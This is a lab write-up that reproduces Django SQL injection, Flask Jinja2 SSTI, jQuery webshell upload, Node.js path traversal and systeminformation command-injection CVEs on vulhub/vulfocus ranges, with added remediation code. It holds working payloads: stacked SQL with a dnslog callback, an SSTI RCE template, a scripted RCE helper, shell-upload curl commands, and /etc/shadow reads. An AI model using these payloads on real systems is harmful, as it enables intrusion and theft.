Framework Security - CVE Vulnerability Reproduction & Django & Flask & Node.js & jQuery Framework Vulnerability Reproduction

Directory

  • Service Attack and Defense - Framework Security & CVE Reproduction & Django & Flask & Node.js & jQuery Vulnerability Reproduction
    • Introduction to the middleware list
    • Common development frameworks by language
    • Python Development Framework Security - Django & Flask Vulnerability Reproduction
      • Django development framework
      • Vulnerability Reproduction
        • CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)
        • CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)
      • Flask Jinja2 SSTI
      • Vulnerability Reproduction
        • Flask (Jinja2) server-side template injection vulnerability
    • JavaScript Development Framework Security - jQuery & Node.js Vulnerability Reproduction
      • jQuery framework
      • Vulnerability Reproduction
        • CVE-2018-9207: jQuery Upload File arbitrary file upload vulnerability reproduction
      • Node.js
      • Vulnerability Reproduction
        • Node.js directory traversal vulnerability (CVE-2017-14849)
        • Node.js command execution (CVE-2021-21315)

Service Attack and Defense - Framework Security & CVE Reproduction & Django & Flask & Node.js & jQuery Vulnerability Reproduction

Introduction to middleware list

Middleware and framework list:

IIS, Apache, Nginx, Tomcat, Docker, K8s, WebLogic, JBoss, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, ThinkPHP, Spring, Flask, jQuery, etc.

1. Development frameworks - PHP - Laravel, ThinkPHP

2. Development frameworks - Java web - Struts2, Spring

3. Development frameworks - Python - Django, Flask

4. Development frameworks - JavaScript - Node.js, jQuery

5. Other frameworks - Java - Apache Shiro & Apache Solr

Common development frameworks by language

PHP: ThinkPHP, Laravel, Yii, CodeIgniter, CakePHP, Zend, etc.

Java: Spring, MyBatis, Hibernate, Struts2, Spring Boot, etc.

Python: Django, Flask, Bottle, TurboGears, Tornado, Web2py, etc.

JavaScript: Vue.js, Node.js, Bootstrap, jQuery, Angular, etc.

Security testing of common middleware:

1. Misconfiguration: parsing flaws & weak passwords

2. Security mechanisms: known product-specific vulnerabilities

3. Security mechanisms: weak-password brute-force attacks

4. Security of applications: framework-specific vulnerabilities

Middleware security testing process:

1. Identify the middleware: name & version & third-party components

2. Identify middleware problems: misconfiguration & publicly known vulnerabilities

3. Identify the exploitation path: weak passwords & public exploits (EXP) & framework vulnerabilities

Application service security testing process:

1. Determine which services are exposed: port scanning & combined applications, etc.

2. Determine the service type: database & file transfer & communication, etc.

3. Determine how the service can be exploited: specific vulnerabilities & unauthorized access & weak passwords, etc.

Development framework component security testing process:

1. Identify which common language development framework is in use

2. Look up the CVE issues affecting that framework and version

Python Development Framework Security - Django & Flask Vulnerability Reproduction

Django development framework

Introduction: see the detailed explanation of Django (Python web framework)

Django is a high-level Python web framework for rapidly developing secure and maintainable websites. Built by experienced developers, Django takes care of much of the hassle of web development, so you can focus on writing your application without reinventing the wheel. It is free and open source, has an active and thriving community, rich documentation, and many free and paid support options.

Django is a popular open-source web framework written in Python; many websites and applications are built on it. Django uses the MTV pattern (Model, Template, View). With Django, programmers can quickly create high-quality, maintainable, database-driven applications, and its large ecosystem of third-party plug-ins makes it highly extensible.

Security issues:

CVE-2019-14234

CVE-2021-35042

Vulnerability Reproduction

CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)

The vulnerability requires that the developer uses a JSONField or HStoreField and that an attacker can control the key name used in a QuerySet lookup. Django's built-in admin application (Django-Admin) satisfies both conditions, which gives an easy way to reproduce the vulnerability. Affected versions: Django 1.11.x before 1.11.23, 2.1.x before 2.1.11 and 2.2.x before 2.2.4.

Target range: vulhub

Reference: Django JSONField/HStoreField SQL injection vulnerability reproduction

[screenshot]

Start the environment:

[screenshot]

Access the web interface:

[screenshot]

First, log in to Django-Admin with the range's credentials:

http://your-ip:8000/admin/

Account: admin  Password: a123123123

Login succeeds:

[screenshot]

Then open the list view of the Collection model:

http://your-ip:8000/admin/vuln/collection/

[screenshot]

Add detail__a'b=123 to the GET parameters, where detail is a JSONField and a'b is the key name being looked up:

payload:

http://your-ip:8000/admin/vuln/collection/?detail__a'b=123

The single quote in the key name lands unescaped in the SQL statement, and the page returns a database error, which confirms the injection point:

[screenshot]

Create a table cmd_exec (the range's database is PostgreSQL; title') closes the quoted key and the key lookup, the semicolon starts a second statement, and -- comments out the rest of Django's original query):

payload:
/admin/vuln/collection/?detail__title')='1' or 1=1%20;create table cmd_exec(cmd_output text)--

Execution effect: the table is created without an error:

[screenshot]

Use cmd_exec to execute a command and confirm it out of band with a DNSlog address. COPY ... FROM PROGRAM runs the command on the database server; it requires superuser privileges or the pg_execute_server_program role, so this step depends on the privileges of the database user the application connects with:

payload:
/admin/vuln/collection/?detail__title')='1' or 1=1%20;copy cmd_exec FROM PROGRAM 'ping xxxx.dnslog.cn'--

[screenshot]

DNSlog callback received:

[screenshot]
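To see why a quote in the key name breaks the query, here is an added example (not Django's code and not part of the original write-up) that models, in a few lines, the string-formatting pattern the pre-fix key lookup used for JSON keys beside the parameterised form the fix introduced. The table and column names "vuln_collection"/detail and the simplified admin changelist parser are assumptions made for the example.

```python
# Added example (not Django's code): a minimal model of how a JSON key lookup
# such as detail__a'b was turned into SQL before the CVE-2019-14234 fix, and
# the parameterised form that closed it. The table and column names are
# constructed to mirror the range's vuln.Collection model.
from __future__ import annotations


def vulnerable_key_lookup(lhs: str, key: str) -> tuple[str, list]:
    """Pre-fix pattern: the key name is quoted by string formatting and pasted
    into the SQL text, so a quote inside the key ends the literal early."""
    try:
        int(key)
        lookup = "%s" % key          # numeric keys index JSON arrays
    except ValueError:
        lookup = "'%s'" % key        # <-- injection point
    return "(%s -> %s)" % (lhs, lookup), []


def fixed_key_lookup(lhs: str, key: str) -> tuple[str, list]:
    """Post-fix pattern: the key name travels as a bound parameter, so the
    driver quotes it and it cannot change the statement's structure."""
    try:
        lookup: object = int(key)
    except ValueError:
        lookup = key
    return "(%s -> %%s)" % lhs, [lookup]


def changelist_where(builder, param: str, value: str) -> tuple[str, list]:
    """Model of the admin changelist turning ?<field>__<key>=<value> into a
    WHERE clause using the given lookup builder (assumed simplification)."""
    field, key = param.split("__", 1)
    lhs = '"vuln_collection"."%s"' % field
    sql, params = builder(lhs, key)
    return "WHERE %s = %%s" % sql, params + [value]
```

Running the page's second payload through the vulnerable builder yields WHERE ("vuln_collection"."detail" -> 'title')='1' or 1=1 ;create table cmd_exec(cmd_output text)--') = %s, which is exactly the stacked statement the range executed; the fixed builder keeps the whole key as one bound parameter.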

CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)

The vulnerability requires that the developer passes user-controlled input to QuerySet.order_by(). Affected versions: Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5; a regression in 3.1 skipped the column-name validation for ordering values that contain a dot. The range's database is MySQL, hence the updatexml() error-based payloads below.

Target range: vulhub

Reference: Django QuerySet.order_by SQL injection vulnerability reproduction

[screenshot]

Start the environment:

[screenshot]

Access the web interface:

[screenshot]

First open the list view and add the order parameter to the GET request.

payload:

http://your-ip:8000/vuln/?order=-id

After execution, the records are sorted by id in descending order, so the parameter reaches order_by():

[screenshot]

payloads (the closing parenthesis terminates the ORDER BY expression Django built, the semicolon starts the injected statement, and # comments out the remainder of the query):

MySQL base directory:
/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)#

Version:
/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select version())),1)#

Database name:
/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select database())),1)#

The closing parenthesis is accepted unchecked, and updatexml() raises an XPath syntax error whose message contains the result of the subquery, so the data comes back in the error page. (Stacked statements depend on the database driver allowing them; where they are not, a boolean or time-based expression inside the ORDER BY clause is the fallback.)

Base directory:

[screenshot]

Version number:

[screenshot]

Database name:

[screenshot]
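The view in the range passes the order parameter straight to order_by(). The following added example (not Django's code and not the range's application) shows the two checks an application should put in front of that call: an allowlist that maps the request value onto orderings the application defined, and, as a second line of defence, the ORDER_PATTERN regex that the fixed Django versions validate ordering names with. The regex is reproduced from memory and the allowlist is constructed for the range's Collection model; both are assumptions.

```python
# Added example (not Django's code): two ways an application can keep a
# user-supplied ?order= value from reaching QuerySet.order_by() unchecked.
# ORDER_PATTERN is the regex Django validates ordering names with
# (django.db.models.sql.constants); it is reproduced here from memory and
# should be treated as an assumption. The allowlist is constructed for the
# range's vuln.Collection model.
import re

ORDER_PATTERN = re.compile(r"\?|[-+]?[.\w]+$")

# Preferred fix: the request value selects an ordering the application
# defined; the value itself is never handed to order_by().
ALLOWED_ORDERINGS = {
    "id": "id", "-id": "-id",
    "name": "name", "-name": "-name",
}


def allowlisted_ordering(user_value: str) -> str:
    try:
        return ALLOWED_ORDERINGS[user_value]
    except KeyError:
        raise ValueError("unsupported ordering: %r" % (user_value,))


def pattern_validated_ordering(user_value: str) -> str:
    """Second line of defence, mirroring the strict validation Django
    3.2.5/3.1.13 restored. It stops quotes, parentheses, spaces and ';',
    but still lets raw 'table.column' references through, so it is not a
    substitute for the allowlist."""
    if not ORDER_PATTERN.match(user_value):
        raise ValueError("invalid ordering: %r" % (user_value,))
    return user_value


def ordering_from_request(params: dict, default: str = "id") -> str:
    """What the /vuln/ view should do with request.GET instead of passing
    the raw order value straight to order_by()."""
    return allowlisted_ordering(params.get("order", default))


def rejects(check, value: str) -> bool:
    try:
        check(value)
    except ValueError:
        return True
    return False
```

With the allowlist, -id and name still work while the updatexml() payload above is rejected before any SQL is built; the regex alone would still accept vuln_collection.name, which is why it is only the backstop.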

Flask Jinja2 SSTI

Introduction: see the detailed explanation of Flask

Flask is a lightweight web application framework written in Python. Its WSGI toolkit is Werkzeug and its template engine is Jinja2. Flask is licensed under the BSD license.

Flask is also called a "microframework" because it keeps a simple core and adds further functionality through extensions. Flask ships with no default database layer or form-validation tool.

Security issue:

Flask (Jinja2) server-side template injection vulnerability

Vulnerability Reproduction

Flask (Jinja2) server-side template injection vulnerability

Server-side template injection (SSTI) arises when user input is concatenated into the template source (for example render_template_string("Hello " + name)) instead of being passed to the template as a variable (render_template_string("Hello {{ name }}", name=name)); Jinja2 then evaluates whatever expressions the input contains.

Target range: vulhub

Reference: Flask (Jinja2) server-side template injection vulnerability reproduction

[screenshot]

Start the environment:

[screenshot]

Access the web interface:

[screenshot]

Next, access http://your-ip/?name={{123*123}}. If the response contains 15129, the expression was evaluated on the server and the SSTI vulnerability exists.

[screenshot]

POC to reach the eval function and execute arbitrary Python code. It walks the subclasses of object to find warnings.catch_warnings, whose __init__.__globals__ contains that module's __builtins__ dict, and calls eval from there:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

Note: the payload must be URL-encoded; once encoded it can be sent directly as the name parameter of a GET request.

[screenshot]

At the command execution point (popen("id")), replace id with the command to run and the information to view. Each time the command changes, the payload must be re-encoded and resent.

[screenshot]

Other commands: ls, whoami

Execution effect:

[screenshot]

[screenshot]
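The encode-and-resend loop above is easy to script. The following added example (not the range's application and not code from the original post) builds the POC for a chosen command, URL-encodes it, decodes it back to check the round trip, and checks a probe response for the evaluated 15129. The base URL http://your-ip, the name parameter and the flattened template are assumptions taken from the steps above.

```python
# Added example (not the vulhub application's code or the original post's):
# helpers that automate the manual steps above, i.e. building the Jinja2 RCE
# payload for a chosen command, URL-encoding it, and reading a probe
# response. The target URL http://your-ip and the "name" parameter are
# assumptions that match the range used here.
from urllib.parse import urlencode, parse_qs, urlsplit
from urllib.request import urlopen

PROBE = "{{123*123}}"
PROBE_RESULT = "15129"

# Same template as the POC above, flattened onto one line; __CMD__ is
# replaced with the shell command.
RCE_TEMPLATE = (
    "{% for c in [].__class__.__base__.__subclasses__() %}"
    "{% if c.__name__ == 'catch_warnings' %}"
    "{% for b in c.__init__.__globals__.values() %}"
    "{% if b.__class__ == {}.__class__ %}"
    "{% if 'eval' in b.keys() %}"
    "{{ b['eval']('__import__(\"os\").popen(\"__CMD__\").read()') }}"
    "{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}"
)


def build_payload(cmd: str) -> str:
    """Embed `cmd` in the POC. The command sits inside two nested string
    literals, so quotes in it would break them; use base64 on the target
    side for anything more complex."""
    if "'" in cmd or '"' in cmd:
        raise ValueError("command must not contain quotes")
    return RCE_TEMPLATE.replace("__CMD__", cmd)


def build_url(base: str, template: str, param: str = "name") -> str:
    """URL-encode the template, which the page notes is required before sending."""
    return base.rstrip("/") + "/?" + urlencode({param: template})


def template_from_url(url: str, param: str = "name") -> str:
    """Decode the parameter back, to check that the encoding round-trips."""
    return parse_qs(urlsplit(url).query)[param][0]


def probe_shows_ssti(response_body: str) -> bool:
    """True when {{123*123}} came back evaluated rather than echoed."""
    return PROBE_RESULT in response_body and PROBE not in response_body


def run_command(base: str, cmd: str, timeout: float = 10) -> str:
    """Send the encoded payload and return the response body (network call)."""
    with urlopen(build_url(base, build_payload(cmd)), timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")
```

run_command("http://your-ip", "whoami") performs the whole cycle for a new command; probe_shows_ssti() is the check to run on the {{123*123}} response before spending any time on the full payload.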

JavaScript Development Framework Security - jQuery & Node.js Vulnerability Reproduction

jQuery framework

Introduction: see the detailed explanation of jQuery

jQuery is a fast and concise JavaScript library, the next major JavaScript code library (framework) after Prototype, released by John Resig in January 2006. Its design goal is "write less, do more". It wraps common JavaScript functionality, offers a simple JavaScript design pattern, and simplifies HTML document manipulation, event handling, animation and Ajax interaction.

Security issues:

CVE-2018-9207

CVE-2018-9208

CVE-2018-9209

Vulnerability Reproduction

CVE-2018-9207: jQuery Upload File arbitrary file upload vulnerability reproduction

jQuery Upload File <= 4.0.2 allows arbitrary file upload through the plugin's PHP upload handler when the plugin is deployed under the web root at /jquery-upload-file: the handler saves whatever is sent to it without checking the file type.

Target range: vulfocus

Open the range:

[screenshot]

Access the web interface:

[screenshot]

Access the plugin directory to confirm the directory structure:

/jquery-upload-file/

[screenshot]

Exploitation:

A single curl command uploads the file. The backdoor files (shell.php, cmd.php) must first be created in the current directory. The form field name is assumed to be myfile, the field the plugin's sample upload.php reads; check the target's upload.php if the upload is rejected.

payload:
# upload the backdoor; the field name myfile is an assumption, see above
curl -F "myfile=@shell.php" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

curl -F "myfile=@cmd.php" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

Upload shell.php:

[screenshot]

Upload cmd.php:

[screenshot]

Check:

Location of the uploaded files (the backdoor is a PHP file):

/jquery-upload-file/php/uploads/

[screenshot]

[screenshot]

Verify that the uploaded PHP file is parsed and executed by requesting it:

[screenshot]

Connect with AntSword:

Connection succeeded

[screenshot]

The other two security issues listed (CVE-2018-9208, CVE-2018-9209) are the same class of bug, an unauthenticated arbitrary file upload, in other jQuery upload plugins and are exploited in essentially the same way.
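What the vulnerable upload.php lacks is any server-side validation. The following added example (not the plugin's code) shows the checks a handler needs: strip directories from the client-supplied name, accept only an allowlist of extensions, confirm the content's magic bytes match the declared type, and store under a server-chosen name outside the web root. The allowed types, the storage directory and the sample files are constructed for the example.

```python
# Added example (not the plugin's upload.php): the server-side checks an
# upload handler needs and that the vulnerable handler lacks. The allowed
# types, the storage directory and the sample files are all constructed.
import hashlib
import os
import posixpath

# allowlist of extensions with the magic bytes the content must start with
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
UPLOAD_ROOT = "/srv/app-data/uploads"   # assumed: outside the web root, never executed as code


def validate_upload(client_name: str, content: bytes) -> str:
    """Return the extension to store under, or raise ValueError."""
    # client_name is attacker-controlled: strip any directory part first
    base = posixpath.basename(client_name.replace("\\", "/"))
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:     # allowlist; a denylist of php/phtml/... is bypassable
        raise ValueError("extension not allowed: " + ext)
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise ValueError("content does not match declared type")
    return ext


def storage_path(client_name: str, content: bytes) -> str:
    """Server-chosen file name under UPLOAD_ROOT; the client name never reaches disk."""
    ext = validate_upload(client_name, content)
    digest = hashlib.sha256(content).hexdigest()[:32]
    return os.path.join(UPLOAD_ROOT, digest + "." + ext)


def is_rejected(client_name: str, content: bytes) -> bool:
    try:
        storage_path(client_name, content)
    except ValueError:
        return True
    return False


# constructed sample inputs
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
```

shell.php, cmd.PhP and shell.php.png with PHP content are all rejected, while an image with a traversal name is stored under a hash name inside UPLOAD_ROOT. A valid image that also carries PHP later in the file still passes the magic-byte check, which is why the storage directory must not be served by the PHP handler at all.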

Node.js

Introduction: see the detailed explanation of Node.js

Node.js is a JavaScript runtime built on the Chrome V8 engine, used to build fast, easily scalable network applications.

Node.js optimizes some special use cases and provides alternative APIs so that V8 runs better outside the browser. The V8 engine executes JavaScript very quickly and performs very well; Node.js is a platform built on that runtime.

Security issues:

CVE-2021-21315

CVE-2017-14849

Vulnerability Reproduction

Node.js directory traversal vulnerability (CVE-2017-14849)

Joyent Node.js is a web application platform built on Google's V8 JavaScript engine by the American company Joyent. The platform is used mainly for building highly scalable applications and for writing connection-handling code that can serve tens of thousands of simultaneous connections on a single machine. Node.js 8.5.0 (fixed in 8.6.0) contains a security vulnerability that a remote attacker can exploit to read sensitive files.

The cause is a logic error in the normalize operation on paths in Node.js 8.5.0. For a path that climbs upward (such as ../../../../../../etc/passwd), inserting foo/../ in the middle (such as ../../../foo/../../../../etc/passwd) makes normalize return /etc/passwd, whereas the correct result is ../../../../../../etc/passwd.

Web frameworks such as Express provide static file serving (express.static), which relies on the normalize function: Express uses it to decide whether a requested path leaves the static directory. The bug makes normalize return a wrong result, so the check is bypassed and arbitrary files can be read.

Target range: vulfocus

Reference: CVE-2017-14849 reproduction

Start the environment:

[screenshot]

Access the web interface:

[screenshot]

The page references /static/main.js, which indicates that a static file server is mounted at /static.

[screenshot]

Construct the request:

Send the following path in a GET request:

/static/../../../a/../../../../etc/passwd

Complete request:

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: 192.168.100.134:56111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

Send it from Burp Repeater. Browsers and curl collapse ../ segments before the request leaves the client, so it has to go out raw (Repeater, or curl --path-as-is):

(If you captured the request from the browser and then edited it, the response may come back with an error status code; try removing the Cookie header and other unrelated headers. If the response is already normal, nothing needs to be removed.)

[screenshot]

Effect: /etc/passwd is read successfully

[screenshot]

Effect: /etc/shadow is read successfully, which only works because the Node process has read access to it, i.e. it runs as a privileged user

[screenshot]
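The following added example (not Express's or Node's code) shows the containment check a static file server must make, exercised with the request path used above. It uses Python's posixpath, whose normalisation is correct, so the first function also shows the result Node 8.5.0 should have returned for the relative path; the static root /app/public is an assumption.

```python
# Added example (not Express's or Node's code): the containment check a static
# file server has to make, exercised with the request path from this
# reproduction. Python's posixpath normalises correctly, so it also shows the
# result Node 8.5.0 should have returned. The static root is an assumption.
import posixpath

STATIC_ROOT = "/app/public"   # assumed location of the static directory


def normalize_path(relative: str) -> str:
    """Correct normalisation: leading '..' segments of a relative path are
    kept; they are never turned into an absolute path."""
    return posixpath.normpath(relative)


def resolve_static(request_path: str, root: str = STATIC_ROOT, mount: str = "/static") -> str:
    """Map a request path to a file under root, or raise PermissionError.

    The check is made on the resolved absolute path, not on the string form
    of the request, so it does not depend on how '..' was spelled.
    """
    if not request_path.startswith(mount + "/"):
        raise FileNotFoundError(request_path)
    relative = request_path[len(mount) + 1:]
    if "\0" in relative:
        raise PermissionError("null byte in path")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # root + "/" keeps /app/public2/x from passing as a child of /app/public
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError("path escapes static root: " + candidate)
    return candidate


def escapes_root(request_path: str, root: str = STATIC_ROOT) -> bool:
    try:
        resolve_static(request_path, root)
    except PermissionError:
        return True
    return False
```

With this check the page's path resolves to /etc/passwd, which is outside /app/public and is refused regardless of what normalize did to the relative form; /static/main.js and /static/css/../main.js both resolve to /app/public/main.js.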

Node.js command execution (CVE-2021-21315)

systeminformation is a Node.js module for retrieving system information; it contains a variety of lightweight functions that return detailed hardware and system-related data. The npm team released a security advisory for a command injection vulnerability (CVE-2021-21315, CVSSv3 score 7.8) in the package: an attacker can execute system commands by injecting a payload into parameters that are not sanitized. Versions before 5.3.1 are affected.

Target range: vulfocus

Start the environment:

[screenshot]

Access the web interface:

[screenshot]

Construct a GET request. The name[] form makes the Express query parser hand the module an array instead of a string, and the $(...) substitution inside it is executed when the module builds its shell command:

payload:
/api/getServices?name[]=$(echo 'rumilc666' > rumi.txt)

After execution:

[screenshot]

Verify:

The file was created inside the container:

docker ps
docker exec -it <container-id> /bin/bash

[screenshot]
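The following added example (not systeminformation's code) shows the bug class in Python form: a service name from the request concatenated into a shell command string, beside the same query with the name validated against an allowlist and passed as its own argv element. The "service query" is a plain echo rather than systemctl so that it runs anywhere, and the injected command is the harmless $(echo injected); both are constructed for the example.

```python
# Added example (not systeminformation's code): the bug class behind
# CVE-2021-21315 in Python form. The vulnerable function builds a shell
# command string from a request-controlled service name; the fixed one
# validates the name and passes it as a separate argv element. To keep the
# demonstration runnable anywhere, the "service query" is a plain echo rather
# than systemctl, and the injected command is the harmless $(echo injected).
import re
import subprocess

SERVICE_NAME = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")   # allowlist, constructed


def run_vulnerable(name: str) -> str:
    """String concatenation + shell=True: $(...) in `name` is expanded by /bin/sh."""
    cmd = "echo status: " + name
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(name: str) -> str:
    """Same query with the name as its own argv element: no shell ever sees it."""
    return subprocess.run(["echo", "status:", name], capture_output=True, text=True).stdout


def run_fixed(name) -> str:
    """argv passing plus an allowlist on the name. Rejecting non-strings
    matters too: name[] in the query string arrives as a list, not a str."""
    if not isinstance(name, str) or not SERVICE_NAME.match(name):
        raise ValueError("invalid service name: %r" % (name,))
    return run_argv(name)


def rejects(name) -> bool:
    try:
        run_fixed(name)
    except ValueError:
        return True
    return False
```

run_vulnerable("$(echo injected)") prints "status: injected" because /bin/sh expanded the substitution, while run_argv() with the same input prints the literal characters; run_fixed() refuses the value (and a list such as ["$(echo injected)"]) before anything is executed.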